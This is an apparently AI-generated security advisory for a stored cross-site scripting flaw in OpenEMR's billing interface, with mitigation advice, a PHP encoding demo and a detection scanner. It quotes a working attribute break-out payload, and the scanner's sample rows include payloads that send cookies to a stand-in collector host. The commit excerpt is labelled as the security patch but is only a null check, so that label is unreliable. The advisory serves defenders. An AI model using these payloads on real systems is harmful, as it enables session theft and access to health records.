CVE-2025-67491 Overview
CVE-2025-67491 is a stored cross-site scripting (XSS) vulnerability in OpenEMR, a widely used free and open source electronic health records (EHR) and medical practice management application. The flaw is in the ub04 helper component of the billing interface, where the $data variable is written into an onclick event handler attribute delimited by single quotes without context-appropriate output encoding.
The value is passed through json_encode, but by default that function leaves the single quote, < and > untouched, so a low-privileged user can store a value that closes the attribute and injects JavaScript that persists on the server. When other users view the record, the script runs in their browser: it can read session cookies and perform actions with the victim's privileges, including an administrator's, which puts patient data confidentiality and system integrity at risk.
Critical Impact
Low-privileged users can embed persistent malicious JavaScript payloads in the billing interface to steal administrator session cookies and perform unauthorized actions, potentially compromising sensitive patient health records and medical practice data.
Affected Products
- OpenEMR versions 5.0.0.5 through 7.0.3.4
- OpenEMR billing interface ub04 helper component
- Healthcare organizations using vulnerable OpenEMR deployments
Discovery Timeline
- 2026-02-25 - CVE-2025-67491 published to NVD
- 2026-02-25 - Last updated in NVD database
Technical Details for CVE-2025-67491
Vulnerability Analysis
This stored XSS vulnerability stems from missing output encoding in the ub04_helpers.php file within OpenEMR's billing interface. User-controlled data is emitted into an onclick event handler attribute delimited by single quotes. The application passes the value through json_encode, but json_encode produces a JavaScript string literal, not an HTML-attribute-safe one: by default it escapes double quotes, backslashes and control characters and leaves ', < and > as they are, so it cannot prevent a break-out when the surrounding context is a single-quoted HTML attribute.
An attacker with low-privilege access to the billing system can craft a payload that breaks out of the single-quote context and injects arbitrary HTML and JavaScript. The malicious payload persists in the database and executes whenever other users—including administrators—view the affected billing records. This persistence makes the attack particularly dangerous in healthcare environments where billing data is frequently accessed by multiple staff members with varying privilege levels.
Root Cause
The root cause is improper output encoding in the interface/billing/ub04_helpers.php file. The $data variable is inserted into an HTML onclick attribute without escaping for that context. json_encode protects the JavaScript string literal (it escapes \" and \\), but the HTML parser processes the attribute before the JavaScript engine ever sees it, and json_encode does not encode the single quote that delimits the attribute unless JSON_HEX_APOS is passed (nor < and > without JSON_HEX_TAG). Any stored value containing ' therefore terminates the attribute value, and the rest of the payload is parsed as markup. The standard remedy is to HTML-attribute-encode the json_encode output (htmlspecialchars with ENT_QUOTES) and, as defense in depth, to call json_encode with the JSON_HEX_TAG | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_HEX_AMP flags.
Attack Vector
The attack is network-accessible and requires low privileges (an authenticated user with access to billing functions). User interaction is required: a victim must view the page containing the stored payload. An attacker can submit a value such as ac' ><img src=x onerror=alert(document.cookie)> in a billing form field; the ' closes the single-quoted onclick attribute, the > closes the element, and the <img> tag that follows is parsed as real markup whose onerror handler fires when the bogus image fails to load. When another user views the affected record, that JavaScript executes in their browser with their session, so it can steal session tokens or perform actions with the victim's privileges.
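To make the Root Cause and Attack Vector sections concrete, here is an added PHP example (not OpenEMR's code and not the patched function) that renders the payload above into a single-quoted onclick attribute both the vulnerable way and the context-encoded way, then parses each result with DOMDocument the way a browser would. The showRecord() handler, the anchor markup and the parse checks are assumptions for illustration.

```php
<?php
// Added example, not OpenEMR's code: reproduces the context mismatch described
// under Root Cause and Attack Vector, then shows context-correct encoding.
// The showRecord() handler and the anchor markup are assumed for illustration.
declare(strict_types=1);

// The payload quoted above: the apostrophe closes the single-quoted attribute
// and the following "><img ...>" is parsed as new markup by the HTML parser.
const PAYLOAD = "ac' ><img src=x onerror=alert(document.cookie)>";

// Vulnerable pattern. json_encode() only escapes what a JSON/JS string literal
// needs (\" \\ and control characters); ' < and > pass through unchanged.
function render_vulnerable(string $data): string
{
    return "<a href='#' onclick='showRecord(" . json_encode($data) . ")'>Edit</a>";
}

// Hardened pattern. JSON_HEX_* makes the literal safe to embed in markup
// (' " < > & become \u0027 \u0022 \u003C \u003E \u0026), and htmlspecialchars()
// with ENT_QUOTES encodes for the attribute context the value actually lands in.
function render_fixed(string $data): string
{
    $flags = JSON_HEX_TAG | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_HEX_AMP | JSON_THROW_ON_ERROR;
    $js = htmlspecialchars(json_encode($data, $flags), ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return "<a href='#' onclick='showRecord(" . $js . ")'>Edit</a>";
}

// Parse a fragment the way a browser would (libxml2's HTML parser).
function parse_fragment(string $html): DOMDocument
{
    $doc = new DOMDocument();
    libxml_use_internal_errors(true);      // broken-out markup is not well-formed
    $doc->loadHTML('<!DOCTYPE html><html><body>' . $html . '</body></html>');
    libxml_clear_errors();
    return $doc;
}

// Number of <img> elements in the fragment: any at all means the attribute
// was broken out of, because the template never emits one.
function injected_images(string $html): int
{
    return parse_fragment($html)->getElementsByTagName('img')->length;
}

// What the JavaScript engine would receive as showRecord()'s argument after the
// HTML parser has entity-decoded the attribute, or null if the call is mangled.
function onclick_argument(string $html): ?string
{
    $a = parse_fragment($html)->getElementsByTagName('a')->item(0);
    if ($a === null || !preg_match('/^showRecord\((.*)\)$/s', $a->getAttribute('onclick'), $m)) {
        return null;
    }
    $arg = json_decode($m[1]);
    return is_string($arg) ? $arg : null;
}

printf("vulnerable: %d injected <img>, argument: %s\n",
    injected_images(render_vulnerable(PAYLOAD)),
    var_export(onclick_argument(render_vulnerable(PAYLOAD)), true));
printf("fixed:      %d injected <img>, argument: %s\n",
    injected_images(render_fixed(PAYLOAD)),
    var_export(onclick_argument(render_fixed(PAYLOAD)), true));
```

Run it with the php CLI: the vulnerable rendering produces one <img> element and a mangled handler (the attribute ends at the apostrophe, so showRecord() never receives a closing parenthesis), while the fixed rendering produces no <img> and round-trips the original string to showRecord(). The htmlspecialchars call is the part that matters: the JSON_HEX_* flags alone would also close this particular hole, but encoding for the outermost context (the HTML attribute) keeps the output correct regardless of which characters json_encode chooses to leave alone.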
// Security patch in interface/billing/ub04_form.php - Merge commit from fork (#9698)
var ii = i+1;
if(typeof(ub04id[ii]) != 'undefined' && ub04id[ii] !== ""){
var val = ub04id[ii];
- if( val.length > max && max > 0 ){
+ if(val != null && val.length > max && max > 0 ){
val = ub04id[ii].substring(0,max);
}
document.getElementById("ub04id"+ ii.toString()).value = val;
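Review bot: the added `val != null` guard in `if(val != null && val.length > max && max > 0 ){` only stops `val.length` from throwing when `ub04id[ii]` is null; nothing in this hunk encodes the value, and it lives in interface/billing/ub04_form.php rather than the ub04_helpers.php output path named under Root Cause, so on its own it cannot be the fix for the single-quoted onclick escape. Either cite the output-encoding change alongside it or relabel the comment on the first line, since a reader will take this JavaScript null check as the security patch. Minor: `val = ub04id[ii].substring(0,max)` re-reads the array where `val.substring(0,max)` would do, and testing `max > 0` before `val.length` would skip the property read when no limit is set.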
Source: GitHub Commit Log
Detection Methods for CVE-2025-67491
Indicators of Compromise
- Unusual JavaScript code patterns in billing records containing <script>, onerror=, onclick=, or similar event handlers
- Outbound requests from staff browsers to unexpected external domains that carry cookie or session values in the URL or body (the exfiltration step of a cookie-stealing payload)
- Billing record entries containing HTML tags such as <img>, <iframe>, or <svg> with event attributes
- Unexpected administrator actions performed during times when legitimate admins were not active
Detection Strategies
- Implement Web Application Firewall (WAF) rules to detect XSS payload patterns in billing form submissions
- Enable Content Security Policy (CSP) headers to prevent inline script execution and report violations
- Deploy endpoint detection solutions to monitor for suspicious browser behavior and credential theft attempts
- Review application logs for billing interface access patterns that suggest reconnaissance or exploitation
Monitoring Recommendations
- Monitor OpenEMR audit logs for unusual billing record modifications or access patterns
- Configure alerts for CSP violation reports indicating attempted XSS execution
- Track session anomalies such as session tokens used from unexpected IP addresses or user agents
- Query the billing tables on a schedule for stored values containing HTML tags or on*= event-handler attributes; generic query logging records that a write happened, not whether its content was malicious
How to Mitigate CVE-2025-67491
Immediate Actions Required
- Upgrade OpenEMR to version 7.0.4 or later immediately to receive the security patch
- Audit existing billing records in the database for signs of injected malicious content
- Force session invalidation and password resets for all users, especially administrators, if compromise is suspected
- Implement Content Security Policy headers to provide defense-in-depth against XSS attacks
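As a first pass for the "audit existing billing records" action above, and for the stored-markup indicators listed under Indicators of Compromise, here is an added PHP scanner (not OpenEMR's code) that runs the indicator patterns over field values and reports which rows hit and why. The rows are constructed for the example; a real audit would feed it the free-text columns of the billing tables, which this page does not name.

```php
<?php
// Added example, not OpenEMR's code: scans stored billing field values for the
// markup patterns listed under Indicators of Compromise. The rows below are
// constructed; a real audit would SELECT the free-text billing columns.
declare(strict_types=1);

const SAMPLE_ROWS = [   // constructed sample, shaped like id/column/value rows
    ['id' => 101, 'field' => 'patient_name', 'value' => "O'Brien, Mary"],
    ['id' => 102, 'field' => 'remarks',      'value' => "ac' ><img src=x onerror=alert(document.cookie)>"],
    ['id' => 103, 'field' => 'remarks',      'value' => '<svg/onload=fetch("//collector.invalid/?c="+document.cookie)>'],
    ['id' => 104, 'field' => 'remarks',      'value' => 'Copay collected, see <b>note</b> on file'],
    ['id' => 105, 'field' => 'remarks',      'value' => '<script>new Image().src="//collector.invalid/"+document.cookie</script>'],
    ['id' => 106, 'field' => 'remarks',      'value' => 'Secondary insurer: Acme Health (claim 44-A)'],
];

// One regex per indicator; the name is reported so triage can see why a row hit.
// Expect some false positives on legitimate free text and review hits by hand.
const XSS_PATTERNS = [
    'script_tag'    => '/<\s*script\b/i',
    'event_handler' => '/\bon[a-z]+\s*=/i',                    // onerror=, onload=, onclick=, ...
    'active_tag'    => '/<\s*(img|iframe|svg|object|embed)\b/i',
    'js_uri'        => '/javascript\s*:/i',
    'attr_breakout' => '/\'\s*>/',                             // the quote-then-> shape of the payload above
];

// Names of every indicator that matches one stored value.
function scan_value(string $value): array
{
    $hits = [];
    foreach (XSS_PATTERNS as $name => $re) {
        if (preg_match($re, $value) === 1) {
            $hits[] = $name;
        }
    }
    return $hits;
}

// Only the rows with at least one indicator, with the indicators named.
function scan_rows(array $rows): array
{
    $findings = [];
    foreach ($rows as $row) {
        $hits = scan_value($row['value']);
        if ($hits !== []) {
            $findings[] = ['id' => $row['id'], 'field' => $row['field'], 'indicators' => $hits];
        }
    }
    return $findings;
}

foreach (scan_rows(SAMPLE_ROWS) as $f) {
    printf("row %d (%s): %s\n", $f['id'], $f['field'], implode(', ', $f['indicators']));
}
```

On the constructed rows it reports 102 (event handler, active tag and the quote-then-> break-out), 103 (svg with onload) and 105 (script tag), and stays quiet on the apostrophe in a surname and on a harmless <b> tag, which is the signal-to-noise balance you want before a person looks at each hit. Point it at the real tables through PDO and it doubles as the scheduled check suggested under Monitoring Recommendations.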
Patch Information
OpenEMR version 7.0.4 addresses this vulnerability with proper input validation and output encoding of the $data variable before it is rendered in the HTML attribute context; the commit excerpt above shows an accompanying null check in the form's JavaScript. Organizations should prioritize the upgrade given the sensitivity of the health data OpenEMR manages.
Detailed patch information is available in the GitHub Security Advisory and the commit implementing the fix.
Workarounds
- Restrict access to the billing interface to only essential personnel until patching is complete
- Implement WAF rules to block requests containing common XSS payload patterns targeting billing endpoints
- Enable a Content Security Policy that blocks execution of injected inline scripts, but roll it out in report-only mode first: OpenEMR's own pages rely on inline scripts and on* handlers, so a strict script-src will break functionality until those are accounted for
- Consider placing the OpenEMR billing interface behind additional authentication or network segmentation
# Configuration example - Apache CSP header to mitigate XSS
# Add to OpenEMR Apache configuration or .htaccess
# Caveat: script-src 'self' blocks inline <script> blocks and on* attributes, which
# OpenEMR's own pages use (the vulnerable onclick handler is itself one). Deploy it
# first under the Content-Security-Policy-Report-Only header name with a report-uri
# or report-to endpoint, work through the violations, and only then switch to the
# enforcing header below.
Header set Content-Security-Policy "default-src 'self'; script-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' data:; frame-ancestors 'none';"
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.

